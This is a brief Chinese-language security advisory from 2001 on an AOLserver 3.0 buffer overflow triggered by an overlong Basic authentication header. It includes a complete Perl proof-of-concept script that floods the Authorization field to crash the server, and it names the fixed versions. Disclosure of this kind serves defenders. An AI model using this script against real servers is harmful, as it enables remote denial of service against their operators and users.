AOLserver 3.0 存在缓冲溢出漏洞发布时间:2001-08-23 更新时间:2001-08-23 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 AOLserver 3.0详细描述 AOLserver 3.0 当接受到超长的认证字符串,可导致服务程序崩溃,允许 攻击者通过缓冲溢出来执行任意代码。 测试代码 #!/usr/bin/perl use IO::Socket; unless (@ARGV == 1) { die "usage: $0 host ..." } $host = shift(@ARGV); $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "http(80)", ); unless ($remote) { die "cannot connect to http daemon on $host" } $junk = "X" x 2048; $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; $remote->autoflush(1); print $remote $killme; close $remote; 解决方案 其中Aolserver 3.4和3.3.1不存在此漏洞 相关信息 -------------------- Nate Haggard SecurityLogics.com |
